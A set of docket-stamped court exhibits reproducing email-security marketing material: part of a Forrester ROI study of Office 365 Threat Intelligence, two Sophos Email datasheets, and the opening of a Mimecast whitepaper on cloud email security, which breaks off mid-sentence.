By implementing Office 365 E5 with Threat Intelligence, organizations reduce both the severity and impact of end user security events. Some organizations reported nearly a 100% reduction in the number of security events they experienced with Office 365 E5 compared to their previous environments. With the implementation of Office 365 E5, organizations across the board could leverage Threat Intelligence to greatly reduce the time-to-action and number of hours spent on remediation of phishing and malware events, resulting in a significant decrease in the impact and number of successful attacks. Organizations leveraged the Threat Intelligence dashboard to provide better visibility into and investigate prospective attacks; with its use of the Microsoft Intelligent Security Graph, Threat Intelligence enables organizations to detect potential threats and make recommendations based on user behavior patterns, enabling security teams to proactively monitor and defend against many attacks. In fact, 90% of survey respondents agreed that Office 365's use of machine learning algorithms mitigated phishing campaigns. With real-time customizable threat alert notifications, the security operations teams could act quickly. Additionally, Threat Intelligence enables organizations to better understand threats, act, and remediate attacks to decrease the severity of the attack, reducing the number of successful malware and phishing attacks.

To calculate the value of this benefit, Forrester assumes that:



**89.3%** reduction in the investigation and remediation with Threat Intelligence



› Before Office 365 Threat Intelligence, the composite organization spent 56 hours per end user security event on investigation and remediation. With Threat Intelligence, the composite organization reduces the time spent on investigation remediation to 6 hours per event, resulting in a time savings of 50 hours per security event.

› Based on survey and interview results, the composite organization experienced 1,008 end user security events annually (84 per month) prior to its investment in Office 365. With Office 365, this number decreases to 480 annually, resulting in the elimination of 528 security events annually.

› An average hourly fully loaded salary of $62.50 is used for IT FTEs.

› As not all time saved translates into additional, value-add work, only 50% of this benefit is realized.

To understand the total benefit associated with the savings from faster remediation of end user security incidents, Forrester calculates out the time saved from completely avoided security incidents, as well as the time saved on remediation for remaining security events.

The reduction in security events will be affected by:

› The number and severity of malware or phishing attacks.

› The average hourly salary of IT.

To account for these risks, Forrester adjusted this benefit downward by 10%, yielding a three-year risk-adjusted total PV of over $1.9 million.

| Ref. | Metric | Calculation | Year 1 | Year 2 | Year 3 |
|------|--------|-------------|--------|--------|--------|
| **Savings From Faster Remediation Of End User Security Events: Calculation Table** | | | | | |
| B1 | Hours per event to investigate and remediate before Threat Intelligence | | 56 | 56 | 56 |
| B2 | Hours per event to investigate and remediate after Threat Intelligence | | 6 | 6 | 6 |
| B3 | **Total hours saved on remediation due to Threat Intelligence** | **B1-B2** | **50** | **50** | **50** |
| B4 | Number of end user security events before Office 365 E5 | 84 per month | 1,008 | 1,008 | 1,008 |
| B5 | Number of end user security events with Office 365 E5 | 40 per month | 480 | 480 | 480 |
| B6 | **Total number of eliminated events** | **B4-B5** | **528** | **528** | **528** |
| B7 | Hours saved from eliminated events | B2*B6 | 3,168 | 3,168 | 3,168 |
| B8 | Hours saved on remaining events | B3*B5 | 24,000 | 24,000 | 24,000 |
| B9 | **Total number of hours saved** | **B7+B8** | **27,168** | **27,168** | **27,168** |
| B10 | Average IT hourly salary | | $62.50 | $62.50 | $62.50 |
| B11 | Productivity capture | | 50% | 50% | 50% |
| Bt | Savings from faster remediation of end user security events | B9*B10*B11 | $849,000 | $849,000 | $849,000 |
| | Risk adjustment | ↓10% | | | |
| **Btr** | **Savings from faster remediation of end user security events (risk-adjusted)** | | **$764,100** | **$764,100** | **$764,100** |

FORRESTER®

## Reduced End User Downtime

With the reduction in both the number and severity of security events also comes a reduction in end user downtime. Previously, when impacted by a malware or phishing attack, end users more frequently required either manual remediation or a complete refresh for the device. Time estimates ranged from 2 hours to greater than a day for these instances. With Office 365 Threat Intelligence, users are less likely to be impacted by malware of phishing attacks that require downtime. The detection and remediation features within Threat Intelligence ensure that downtime is kept to a minimum for the employees, while helping the IT team better understand how to quickly address the issue.

For the composite organization, Forrester assumes that:

› Each of the 5,000 Threat Intelligence users experiences an average of 1.5 downtime events per year, based on survey and interview feedback.

› Each downtime event causes an average of 4 hours of downtime. With the implementation of Office 365 Threat Intelligence, users avoid this downtime.

› An average hourly fully loaded salary of $40 represents a blended rate across workers.

› Again, as not all time saved translates into additional, value-add work, only 50% of this benefit is realized.

The reduction in end user downtime can vary with:

› The number of Office 365 Threat Intelligence users.

› The rate and severity of malware of phishing attacks.

› The mean-time-to-remediation.

› The fully burdened salary of end users.

To account for these risks, Forrester adjusted this benefit downward by 15%, yielding a three-year risk-adjusted total PV of nearly $1.3 million.



**$1.3 million**

three-year benefit PV

30%

**Reduced end user downtime:**
**30%** of total benefits

| Reduced End User Downtime: Calculation Table | | | | | |
|---|---|---|---|---|---|
| Ref. | Metric | Calculation | Year 1 | Year 2 | Year 3 |
| C1 | Total number of users | | 5,000 | 5,000 | 5,000 |
| C2 | Average number of downtime events per year | | 1.5 | 1.5 | 1.5 |
| C3 | Average end user downtime per event | Hours | 4 | 4 | 4 |
| C4 | Average end user fully loaded hourly salary | | $40 | $40 | $40 |
| C5 | Percent productivity capture | | 50% | 50% | 50% |
| Ct | Reduced end user downtime | C1*C2*C3*C4*C5 | $600,000 | $600,000 | $600,000 |
| | Risk adjustment | ↓15% | | | |
| **Ctr** | **Reduced end user downtime (risk-adjusted)** | | **$510,000** | **$510,000** | **$510,000** |

FORRESTER®

## Reduced Likelihood Of A Data Breach — Business Impact

Malware and phishing attacks create a considerable risk of a serious data breach that could have wide-reaching business impacts on an organization. For this benefit, Forrester focuses specifically on the business impact costs associated with a successful security breach. In the Ponemon Insitute's "2017 Cost of Data Breach Study," the average lost customer business from a breach is $1.69 million — however, in the US, it is signficantly higher at $4.13 million.[1] The average cost to communicate with the affected third parties is $205,000. Together, the cost is nearly $1.9 million per incident in business impact. Through the use of Office 365 Threat Intelligence, organizations protect themselves against a major data breach by better understanding the threat landscape, improved monitoring of potential threats, and decreased effort required to remediate an issue to quickly suppress the risk for a larger data breach.

For the composite organization, Forrester assumes that:

› The average business impact of a data breach is over $1.89 million.

› Based on research conducted by the Ponemon Institute, the probability of a data breach is 13.85%.

› Based on feedback from the interviews and surveys, the likelihood of a data breach is reduced by 60% by Year 3 as organizations improve their use of Threat Intelligence and can better proactively monitor their threat landscapes.

This benefit can vary with:

› The size, industry, region, and other factors of an organization that may impact the business impact costs associated with a data breach.

› The severity of malware of phishing attacks.

› An organization's ability to leverage Threat Intelligence to detect threats.

To account for these risks, Forrester adjusted this benefit downward by 10%, yielding a three-year risk-adjusted total PV of nearly $321,341.



**60%** reduction in the likelihood of a data breach with Threat Intelligence

| Reduced Likelihood Of A Data Breach — Business Impact: Calculation Table | | | | | |
|---|---|---|---|---|---|
| Ref. | Metric | Calculation | Year 1 | Year 2 | Year 3 |
| D1 | Average business impact of data breach | | $1,895,714 | $1,895,714 | $1,895,714 |
| D2 | Average probability of a data breach occurrence | | 13.85% | 13.85% | 13.85% |
| D3 | Reduced likelihood of a data breach with Office 365 Threat Intelligence | | 50.0% | 55.0% | 60.0% |
| Dt | Reduced likelihood of data breach — business impacts | D1*D2*D3 | $131,278 | $144,406 | $157,534 |
| | Risk adjustment | ↓10% | | | |
| **Dtr** | **Reduced likelihood of data breach (risk-adjusted)** | | **$118,150** | **$129,965** | **$141,780** |

FORRESTER®

Case 0:20-cv-60416-XXXX   Document 1-39   Entered on FLSB Docket 02/26/2020   Page 17 of 26

## Flexibility

The value of flexibility is clearly unique to each customer, and the measure of its value varies from organization to organization. There are multiple scenarios in which a customer might choose to implement Office 365 Threat Intelligence and later realize additional uses and business opportunities, including:

› **Education and training offerings.** Organizations understand that a key component of threat protection is training end users to recognize and correctly react and respond to potential threats. With new features like attack simulator, the organization can test, in a controlled environment, different types of realistic attacks on end users to better understand where the company may require more training. Furthermore, this tool can educate end users and prevent the potential for a future security breach.

› **Utilizing the newest offerings from Microsoft Office 365 Threat Intelligence.** Microsoft is continually innovating on new product features and functionality. For example, Threat Intelligence will be increasing its use of automation features, like automated incidence response to address security incidents. Functionality such as this will help users maximize the business impact of their Office 365 E5 investments.

› **Increasing user base.** Organizations can further improve the business value they receive by adding additional users to see wider security efficiency and effectiveness throughout the organizations.

Flexibility would also be quantified when evaluated as part of a specific project (described in more detail in Appendix A).

> Flexibility, as defined by TEI, represents an investment in additional capacity or capability that could be turned into business benefit for a future additional investment. This provides an organization with the "right" or the ability to engage in future initiatives but not the obligation to do so.



# Analysis Of Costs

**QUANTIFIED COST DATA AS APPLIED TO THE COMPOSITE**

| | Total Costs | | | | | | |
|---|---|---|---|---|---|---|---|
| **REF.** | **Cost** | **Initial** | **Year 1** | **Year 2** | **Year 3** | **Total** | **Present Value** |
| Etr | Licensing costs | $0 | $576,000 | $576,000 | $576,000 | $1,728,000 | $1,432,427 |
| Ftr | Implementation, ongoing support, and training costs | $5,775 | $6,825 | $6,825 | $6,825 | $26,250 | $22,748 |
| | **Total costs (risk-adjusted)** | **$5,775** | **$582,825** | **$582,825** | **$582,825** | **$1,754,250** | **$1,455,175** |

## Licensing Costs

For the composite organization, Forrester uses the list price of $8 per license per month. The composite organization purchases a total of 6,000 licenses to protect its individual and shared mailboxes.

While Office 365 Threat Intelligence is available as an add-on at the licensing costs shown below, it is important to note that many organizations have access to Threat Intelligence through their Office 365 E5 licensing.

> The table above shows the total of all costs across the areas listed below, as well as present values (PVs) discounted at 10%. Over three years, the composite organization expects risk-adjusted total costs to be a PV of more than $1.45 million.

| | Licensing Costs: Calculation Table | | | | |
|---|---|---|---|---|---|
| **Ref.** | **Metric** | **Calculation** | **Year 1** | **Year 2** | **Year 3** |
| E1 | Number of licenses | | 6,000 | 6,000 | 6,000 |
| E2 | Annual cost | $8 per month | $96 | $96 | $96 |
| Et | Licensing costs | E1*E2 | $576,000 | $576,000 | $576,000 |
| | Risk adjustment | 0% | | | |
| **Etr** | **Licensing costs (risk-adjusted)** | | **$576,000** | **$576,000** | **$576,000** |

## Implementation, Ongoing Support, and Training Costs

Organizations reported relatively low implementation and support effort required, but this ranged based on the size of the organization. Likewise, the training required depended on the size of the security operations team and other individuals who needed to be trained on the solution. For the composite organization:

> Initial implementation requires 24 person-hours; for many organizations running E5, this was part of the overall Office 365 implementation. Ongoing support requires 96 person-hours per month.

> Additionally, the eight members of the security operations team join 8 hours of training on how to use the solution. To account for 10% turnover, the model accounts for an additional training session for new members of the security operations staff each year.

> Implementation risk is the risk that a proposed investment may deviate from the original or expected requirements, resulting in higher costs than anticipated. The greater the uncertainty, the wider the potential range of outcomes for cost estimates.



These costs can vary with:

› The size of the deployment, which may require more implementation and support hours.

› The number of team members requiring training.

› The average hourly salary of IT.

To account for these risks, Forrester adjusted this cost upward by 5%, yielding a three-year risk-adjusted total PV of $22,748.

| Ref. | Metric | Calculation | Initial | Year 1 | Year 2 | Year 3 |
|------|--------|-------------|---------|--------|--------|--------|
| **Implementation, Ongoing Support, And Training Costs: Calculation Table** | | | | | | |
| F1 | Implementation | Person-hours | 24 | | | |
| F2 | Ongoing support | Person-hours | | 96 | 96 | 96 |
| F3 | Number of trainees | | 8 | 1 | 1 | 1 |
| F4 | Time spent training | Hours | 8 | 8 | 8 | 8 |
| F5 | Average fully loaded IT salary | | $62.50 | $62.50 | $62.50 | $62.50 |
| Ft | Implementation, ongoing support and training costs | F1+F2+(F3*F4)*F5 | $5,500 | $6,500 | $6,500 | $6,500 |
| | Risk adjustment | ↑5% | | | | |
| **Ftr** | **Implementation, ongoing support and training costs (risk-adjusted)** | | **$5,775** | **$6,825** | **$6,825** | **$6,825** |

**FORRESTER**®

Case 0:20-cv-60416-XXXX   Document 1-39   Entered on FLSD Docket 02/26/2020   Page 20 of 726

# Financial Summary

**CONSOLIDATED THREE-YEAR RISK-ADJUSTED METRICS**

## Cash Flow Chart (Risk-Adjusted)



> The financial results calculated in the Benefits and Costs sections can be used to determine the ROI, NPV, and payback period for the composite organization's investment. Forrester assumes a yearly discount rate of 10% for this analysis.



These risk-adjusted ROI, NPV, and payback period values are determined by applying risk-adjustment factors to the unadjusted results in each Benefit and Cost section.

**Cash Flow Table (Risk-Adjusted)**

|  | INITIAL | YEAR 1 | YEAR 2 | YEAR 3 | TOTAL | PRESENT VALUE |
|---|---|---|---|---|---|---|
| Total costs | ($5,775) | ($582,825) | ($582,825) | ($582,825) | ($1,754,250) | ($1,455,175) |
| Total benefits | $0 | $1,615,844 | $1,676,878 | $1,742,130 | $5,034,852 | $4,163,687 |
| Net benefits | ($5,775) | $1,033,019 | $1,094,053 | $1,159,305 | $3,280,602 | $2,708,513 |
| ROI |  |  |  |  |  | 186% |
| Payback period |  |  |  |  |  | 6 months |

**FORRESTER**

Case 0:20-cv-60416-XXXX   Document 1-39   Entered on FLSD Docket 02/26/2020   Page 21 of
26

# Microsoft Office 365 Threat Intelligence: Overview

The following information is provided by Microsoft. Forrester has not validated any claims and does not endorse Microsoft or its offerings.

Office 365 Threat Intelligence helps security operations and administrators protect their organizations' Office 365 users by:

› Making it easy to identify, monitor, and understand attacks.

› Helping to quickly address threats in Exchange Online and SharePoint Online.

› Providing insights and knowledge to prevent attacks against their organizations.

Office 365 Threat Intelligence is a collection of insights and information available in the Office 365 Security & Compliance Center. These insights can help your organization's security team protect Office 365 users from attacks. Office 365 Threat Intelligence monitors signals and gathers data from multiple sources, such as user activity, authentication, email, compromised PCs, and security incidents. Business decision makers and Office 365 global administrators, security administrators, and security analysts can all use the information Office 365 Threat Intelligence provides to understand and respond to threats against Office 365 users and intellectual property.

The Threat Dashboard (also referred to as the Security Dashboard) allows users to quickly see what threats have been addressed, and as a visual way to report to business decision makers how Office 365 services are securing your business.

Use the Threat Explorer to analyze threats, see the volume of attacks over time, and analyze data by threat families, attacker infrastructure, and more. The Threat Explorer is the starting place for any security analyst's investigation workflow.

Use the Incidents list to see a list of in-flight security incidents. Incidents are used to track threats such as suspicious email messages and to conduct further investigation and remediation.



Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSB Docket 02/26/2020   Page 618 of
726
Case 0:20-cv-60416-XXXX   Document 1-39   Entered on FLSD Docket 02/26/2020   Page 22 of
26

# Appendix A: Total Economic Impact

Total Economic Impact is a methodology developed by Forrester Research that enhances a company's technology decision-making processes and assists vendors in communicating the value proposition of their products and services to clients. The TEI methodology helps companies demonstrate, justify, and realize the tangible value of IT initiatives to both senior management and other key business stakeholders.

## Total Economic Impact Approach



**Benefits** represent the value delivered to the business by the product. The TEI methodology places equal weight on the measure of benefits and the measure of costs, allowing for a full examination of the effect of the technology on the entire organization.



**Costs** consider all expenses necessary to deliver the proposed value, or benefits, of the product. The cost category within TEI captures incremental costs over the existing environment for ongoing costs associated with the solution.



**Flexibility** represents the strategic value that can be obtained for some future additional investment building on top of the initial investment already made. Having the ability to capture that benefit has a PV that can be estimated.



**Risks** measure the uncertainty of benefit and cost estimates given: 1) the likelihood that estimates will meet original projections and 2) the likelihood that estimates will be tracked over time. TEI risk factors are based on "triangular distribution."

The initial investment column contains costs incurred at "time 0" or at the beginning of Year 1 that are not discounted. All other cash flows are discounted using the discount rate at the end of the year. PV calculations are calculated for each total cost and benefit estimate. NPV calculations in the summary tables are the sum of the initial investment and the discounted cash flows in each year. Sums and present value calculations of the Total Benefits, Total Costs, and Cash Flow tables may not exactly add up, as some rounding may occur.



**Present value (PV)**

The present or current value of (discounted) cost and benefit estimates given at an interest rate (the discount rate). The PV of costs and benefits feed into the total NPV of cash flows.



**Net present value (NPV)**

The present or current value of (discounted) future net cash flows given an interest rate (the discount rate). A positive project NPV normally indicates that the investment should be made, unless other projects have higher NPVs.



**Return on investment (ROI)**

A project's expected return in percentage terms. ROI is calculated by dividing net benefits (benefits less costs) by costs.



**Discount rate**

The interest rate used in cash flow analysis to take into account the time value of money. Organizations typically use discount rates between 8% and 16%.



**Payback period**

The breakeven point for an investment. This is the point in time at which net benefits (benefits minus costs) equal initial investment or cost.

**FORRESTER®**

Case 0:20-cv-60416-AMC Document 3-1 Entered on FLSB Docket 02/26/2020 Page 619 of
Case 0:20-cv-60416-XXXX Document 1-89 Entered on FLSB Docket 02/26/2020 Page 23 of
726

# Appendix B: Endnotes

---

[1] Source: "2017 Cost of Data Breach Study," Ponemon Institute, June 2017.

FORRESTER®

Case 0:20-cv-60416-XXXX Document 3-40 Entered on FLSD Docket 02/26/2020 Page 1 of 3

# EXHIBIT 38

Case 0:20-cv-60416-XXXX   Document 3-40   Entered on FLSD Docket 02/26/2020   Page 21 of 3

**SOPHOS**

Security made simple.

# Sophos Email

## Protect and manage your email with Sophos Central

Sophos Email is a secure email gateway engineered to keep businesses safe from all email threats. It simply stops spam, phishing, malware and data loss and keeps your people productive. And if want to consolidate protection it lets you control email security alongside endpoint, mobile, web, and wireless protection from Sophos Central's single interface.

### Highlights

‣ Support for all major platforms

‣ Uses advanced multi-layer spam detection

‣ Blocks targeted spear phishing attacks

‣ Protects users from new zero-day threats

‣ Provides SPF anti-spoofing

‣ Automatic Active Directory Synchronization

‣ Self-Service Portal allows end users to manage their protection

‣ Ensures email continuity with spooling and emergency inbox

### Instant proven protection

Sophos Email works right out of the box with our default settings, giving you instant protection for your mailboxes by intercepting all email containing suspicious content, attachments or URLs. Sophos Email uses the latest anti-malware and phishing-detection technology that constantly updates to detect the latest threats. You get phishing and impostor email detection with support for SPF anti-spoofing.

### Simply secure Microsoft Exchange, Office 365, and Google Apps

Shifting your email to the cloud doesn't mean you have to reduce your security. Securing your email server or service with Sophos Email ensures you get trusted email security powered by the SophosLabs global network. And, you get the reassurance of continuity in the event of disruption to Microsoft services.

### Say goodbye to spam and unwanted mail

Our reputation filtering blocks over 99% of spam at the gateway, and our anti-spam engine catches the rest, including the latest phishing attacks. Sophos Email filters incoming email by using a variety of advanced detection methods, across many languages.

### Ensure your email is always on

When your email server experiences an outage or there's a disruption to a cloud-based service, Sophos Email automatically queues all incoming mail until the server comes back online. When the service comes back online, all queued mail is delivered, safe and sound. You get automatic alerts, spooling to ensure no mail is ever lost, and an emergency inbox to keep your people productive.

### Empower end users with the self-service portal

Our self-service user portal lets users access and manage their email quarantine, allowing them to release messages inadvertently marked as spam. They can also create and manage email-sender allow/block lists to manage their own security.



Case 0:20-cv-60416-XXXX Document 3-40 Entered on FLSD Docket 02/26/2020 Page 622 of 726

Sophos Email

## Getting started is easy

Deployment requires a simple MX record change to route email through Sophos Central. It works with any local email server, and you can simply bring in users and their mailboxes with our handy Active Directory synchronization.

## Sophos Email is part of Sophos Central

Simplify your life with a single pane-of-glass for all your security. Sophos Central lets you manage email alongside endpoint, web, wireless, and more all through a single, unified console. You get a single up-to-date, Sophos-hosted platform that's simple and intuitive. Find out more at sophos.com/central.

### Simple, effective management

We've optimized all the daily workflow routines, not only making them intuitive, but also by streamlining the whole process. A simple slide bar lets you set the content filtering threshold. You are never more than a few clicks away from adjusting a policy or running a report.

## Technical Specifications

Sophos Email protects and manages your email in the cloud through Sophos Central.

### Browser requirements for Sophos Central management interface

‣ Microsoft Internet Explorer 11
‣ Microsoft Edge
‣ Chrome
‣ Firefox
‣ Safari

Check for all supported browsers

### Technical specifications and email server compatibility for Sophos Email services

‣ Microsoft Exchange 2003 or later
‣ Exchange Online/Office 365
‣ Google Apps for Work

Support is not limited to just these platforms. If your service is not listed, please check with Sophos to see if your platform can be supported.

## How to buy

Sophos Email offers enterprise-grade email protection integrated into Sophos Central. Licenses are priced per user with annual subscriptions.

We have two license offerings:

‣ Sophos Email Standard delivers proven protection at a great price-point

‣ Sophos Email Advanced** provides our best protection with advanced features

## Sophos Licenses

| | Sophos Email Standard | Sophos Email Advanced** |
|---|---|---|
| Exchange 2003+, Office 365, and Google Apps and more | ✓ | ✓ |
| Advanced multilayer spam filtering | ✓ | ✓ |
| Allow/block list for enterprise | ✓ | ✓ |
| Self-service portal for end users | ✓ | ✓ |
| Email quarantine for end users | ✓ | ✓ |
| Spooling (ensures no mail is ever lost) | ✓ | ✓ |
| User access to a 24/7 emergency inbox * | ✓ | ✓ |
| Allow/block list for end users * | ✓ | ✓ |
| Phishing URL protection | ✓ | ✓ |
| Provides SPF* and DKIM** anti-spoofing | ✓ | ✓ |
| Email attachment filtering policy ** | | ✓ |
| Time-of-click URL protection ** | | ✓ |
| Sophos Sandstorm cloud-based sandboxing ** | | ✓ |

*Available in October 2016
**Available in early 2017

## Try it now for free

Register for a free 30-day evaluation at sophos.com/sophosemail

United Kingdom and Worldwide Sales
Tel: +44 (0)8447 671131
Email: sales@sophos.com

North American Sales
Toll Free: 1-866-866-2802
Email: nasales@sophos.com

Australia and New Zealand Sales
Tel: +61 2 9409 9100
Email: sales@sophos.com.au

Asia Sales
Tel: +65 62244168
Email: salesasia@sophos.com

Oxford, UK
© Copyright 2016. Sophos Ltd. All rights reserved.
Registered in England and Wales No. 2096520, The Pentagon, Abingdon Science Park, Abingdon, OX14 3YP, UK
Sophos is the registered trademark of Sophos Ltd. Other product and company names mentioned are trademarks or registered trademarks of their respective owners.

16-06-03 DSNA (DD-2356)



Case 0:20-cv-60416-XXXX   Document 3-41   Entered on FLSD Docket 02/26/2020   Page 1 of 3

# EXHIBIT 39

Case 0:20-cv-60416-XXXX   Document 3-1   Entered on FLSD Docket 02/26/2020   Page 624 of
726



# Sophos Email

## Cloud Email security powered by artificial intelligence

Sophos Email is cloud email security simply delivered through Sophos Central's easy-to-use single management console. Protecting your people from unwanted and malicious email threats today, and tomorrow, with the latest artificial intelligence.

### Highlights

‣ Predictive email security able to block known and unknow threats

‣ Stop ransomware, spam, and phishing attacks

‣ Support for all major platforms

‣ Automatic Active Directory Synchronization

‣ Self-Service Portal with end-user and admin controls



### Smarter Email Security

Today's email threats move fast, and malicious files look more and more like benign files. Growing businesses need predictive email security - defeating today's threats with an eye on tomorrow.

### See the Future

Using the same technology as our award-winning Intercept X, the artificial intelligence built into Sophos Email's Sandstorm sandboxing technology is a deep learning neural network, able to detect suspicious payloads containing threats, malware and unwanted applications, as well as high-level threats embedded in documents, including ransomware.

Sophos Sandstorm detonates these files in series of virtual machines, simulating a real end user environment where behavior can be monitored. Delivering safe documents – not just PDFs.

### Block Stealth Attacks

Protecting employees from malicious website links, our advanced URL protection is out-smarting attackers who slip phishing URLs past traditional gateways - delaying the upload of malware to websites until after the email is delivered. Sophos Time-of-Click checks website reputation before delivery and at the time you click – blocking stealthy, delayed attacks.

### Trust Your Inbox

Attackers relentlessly target organizations with spam, phishing, and advanced socially engineered attacks. Automate phishing imposter defense with Sophos Email authentication. Protecting your employees from phishing attacks using fraudulent email addresses that impersonate trusted contacts and domains, before they reach the inbox.

Using a combination of SPF, DKIM and DMARC authentication techniques and email header analysis, Sophos Email allows you to identify and allow legitimate emails from trusted partners, and block the imposter – allowing you to trust your inbox again.

Case 0:20-cv-60416-XXXX   Document 3-1   Entered on FLSD Docket 02/26/2020   Page 35 of 726

Sophos Email

## Flexible Deployment

Sophos Email was born to be flexible. Creating unique security policies for individuals, groups or the whole domain can be done in minutes – saving you valuable time.

While seamless integration with Microsoft Office 365, Google G Suite, on-premises Exchange 2003+, and many more email providers, allows you to protect any email service where you control the domain and DNS records. Best of all - activation is completely in your control, with administrator controls and end-user self-service for common day-to-day tasks.

## Secure Office 365

The answer for business-grade email. Email, Office, Collaboration – Microsoft Office 365 is a great tool for businesses to stay productive. But as customers move to O365, the security features often don't live up to expectations. Great collaboration needs great security, and Sophos Email provides a simple solution:

- One Advanced license secures Office 365 from the latest spam, phishing and advanced threats
- Ensure compliance with a choice of location for email scanning and sandbox analysis
- Single easy-to-use management console

## Getting Started is Easy

Deployment requires a simple MX record change to route email through Sophos Central, and you can simply bring in users and their mailboxes with our handy Azure and on premise Active Directory synchronization tools.

## How to Buy

Priced per user with bands from 5 to 5000+, Sophos Email keeps things simple so you can focus on protecting your business, data and employees.

## Sophos Email Features

| Protection and Management | Email Advanced |
|---|:---:|
| Inbound Message Scanning | ✓ |
| Outbound Message Scanning | ✓ |
| Domain / Group / User Policies | ✓ |
| Admin and User Quarantine | ✓ |
| Admin Allow / Block Lists | ✓ |
| AD Sync or Azure AD Sync | ✓ |
| 24/7 Emergency Inbox | ✓ |
| Message Processing Locations (Dublin, Frankfurt, USA) | ✓ |
| Anti Spam Filters | ✓ |
| Delay Queue | ✓ |
| Inbound SPF, DKIM and DMARC | ✓ |
| Anti Virus Filters | ✓ |
| Time-of-Click URL Protection | ✓ |
| Sophos Sandstorm | ✓ |
| Sophos Sandstorm Locations (Dublin, Japan, USA) | ✓ |

## Try it now for free

Register for a free 30-day evaluation at sophos.com/email.

United Kingdom and Worldwide Sales
Tel: +44 (0)8447 671131
Email: sales@sophos.com

North American Sales
Toll Free: 1-866-866-2802
Email: nasales@sophos.com

Australia and New Zealand Sales
Tel: +61 2 9409 9100
Email: sales@sophos.com.au

Asia Sales
Tel: +65 62244168
Email: salesasia@sophos.com

© Copyright 2018. Sophos Ltd. All rights reserved.
Registered in England and Wales No. 2096520, The Pentagon, Abingdon Science Park, Abingdon, OX14 3YP, UK
Sophos is the registered trademark of Sophos Ltd. All other product and company names mentioned are
trademarks or registered trademarks of their respective owners.

2018-06-08 DSNA (PC)



# EXHIBIT 40

**mimecast**

WHITEPAPER

# Security-as-a-Service:
# Threat mitigation from the cloud



**You can't treat security as a set of isolated point systems. That's true of your business information in general and of your email architecture specifically. Protecting information is one side of the coin; making it available and accessible is the other and if you do both right you can improve productivity as well as avoid risk.**

The cloud isn't just the most effective place to secure email, before any threats or intruders ever reach your network; it's also the most efficient. Cloud-based email services can offer full protection with the promise of availability and reliability too.

# Contents

**03  Securing email in the cloud**

    03  **Security with universal accessibility**

    04  **Email intelligence**

    04  **Managing email security yourself**

    05  **Risk management and security**

    05  **Fragmented security systems**


**06  Making security a service**

    06 **Security in the cloud**

    06 **Security with Mimecast: at rest, in transit and in use**

    07 **Anti-malware**

    07 **Anti-spam**

    08 **Zero-day protection**

    09 **Policy enforcement**

    10 **Audit trails**

    10 **Securing the cloud**


**11  Security is holistic**

    11 **Scaled-up security**

# Executive Summary

A cloud email platform needs to have four key features:

- Confidentiality
- Integrity
- Availability
- Control

That's what you get from Mimecast's security services, without having to patch and update a mixture of different security tools in your own network. It's a complete risk management and compliance platform, with anti-malware, anti-spam, zero-day protection, and policy enforcement. At the same time, there's a complete audit trail and secure encrypted storage on the Mimecast® storage grid.

# Securing email in the cloud

## Security with universal accessibility

Security is more than keeping unauthorized users out of your network and viruses off your desktops. It's not just about encrypting data or blocking spam, monitoring compliance, ensuring privacy or protecting company resources, important as all of those are. If you take the wider view, security means ensuring the confidentiality, integrity and availability of business information. While line-of-business applications and back-end databases are crucial, more and more of that business information is in email on desktops and laptops, which makes it both convenient and vulnerable. It doesn't matter where in the value or supply chain you are, you're relying on email for all manner of vital communications.



Securing email – at rest, in use and in motion – is a key part of any IT security strategy and doing that in the cloud has significant advantages for confidentiality, integrity and availability. For one thing, you're protected from spam and malware before it ever reaches your premises; keeping up with thousands of new threats a day is an unnecessary battle for individual businesses to fight. For another, as with other cloud services you're gaining the expertise and economies of scale of a dedicated service, which means savings on up-front costs and ongoing administration, making a big difference to how quickly you can see value from the system you put in place.



And for email in particular, having it protected in the cloud means it's available in the cloud; as convenient as having it on your laptop but without the security risks. That makes the difference between security that gets in the way of users, forcing them to resort to insecure workarounds to get their job done, and security that gives you the flexibility and control to allow business users to stay productive. At best, security is usually seen as a necessary evil; at worst it actually hampers the business. More than 80% of IT security and business executives say they've given up opportunities for innovation in business because of concerns about









# Securing email in the cloud

## Email intelligence

You can give users access to a mass of useful information about customers, products, colleagues, negotiations, existing contracts and useful contacts, just by letting them search their email efficiently. Who is the best person to work with at a company you haven't dealt with recently? How quickly does a supplier usually get back to you? How often has a potential partner been recommended by colleagues? Often, the information they need is sitting in an old message, but if mail server quotas mean they only have a few weeks of email in their inbox then they're faced with losing access to key business information or keeping PST files on their hard drive, which exposes the information to a host of security threats and impedes eDiscovery should it be required.




Making email available and searchable in the cloud means that it stays secure, but is still accessible. It's the best of both worlds for the user, the IT administrator and the business. Users are no longer restricted by lack of resources, and can take advantage of being able to work anywhere, and at anytime.

## Managing email security yourself

Implementing on-premise infrastructure required to ensure an email system is secure and compliant takes time and requires significant post-installation maintenance. As the email attack surface is large, it's important for businesses to keep their security platform up to date – but this has significant time and budgetary impact, as well as affecting the resources available to IT departments. Time spent maintaining an email security system is time that's not being spent developing new systems or improving business processes.



Putting security in place isn't a one-time deal. It needs ongoing management, to ensure security infrastructure is kept up to date and regularly maintained. Mail administrators need to regularly patch and upgrade software to deal with new techniques employed by malware and spam authors. Significant investment will be required for hardware and software – which is an ongoing expense – as well as subscriptions to support services. Appliance lifetimes are typically short, like PCs and servers, and they will need to be replaced every three or four years. Replacing appliances is another risk, as cover needs to be kept in place while new hardware is installed, and services are migrated between what are likely to be very different security platforms.



The cost of an administrator's time needs to be taken into account too, as effective management of an email security platform will often require the equivalent of at least one, or maybe more, full-time positions. And beyond the individual costs, this is a permanently defensive approach to security, and one that means that mail security will always be a cost to a business, where it will be hard to identify any return on security investment. Getting and collating reports to help understand the returns is an issue in its own right, as fragmented servers and services make it hard to get the right level of visibility into the operations of your mail platform. Mail security teams will find it hard to report in terms of business benefits when the only effective metric is the number of days between security failures.

# Securing email in the cloud

## Risk management and security

And you can't simply ignore the problem because of the costs; effective email security is a business necessity. Email introduces risks into the organization, and risks need to be managed. Insecure mail opens you up to all manner of attacks and issues. Spam gets in the way of normal mail traffic, and distracts staff. Productivity drops every time a user has to delete a spam message, and with 80 – 85% of a user's email being spam, it's wasted time that quickly adds up.

It's not just advertising spam, either. Spam is now one of the main routes malware takes into a company. A plausible message with an attachment is a ticking time bomb that could end up compromising machines, adding them to botnets and opening up their file systems to the prying eyes of criminals. It's not just obvious spam that delivers malware; it can also come from trusted sources.



## Fragmented security systems

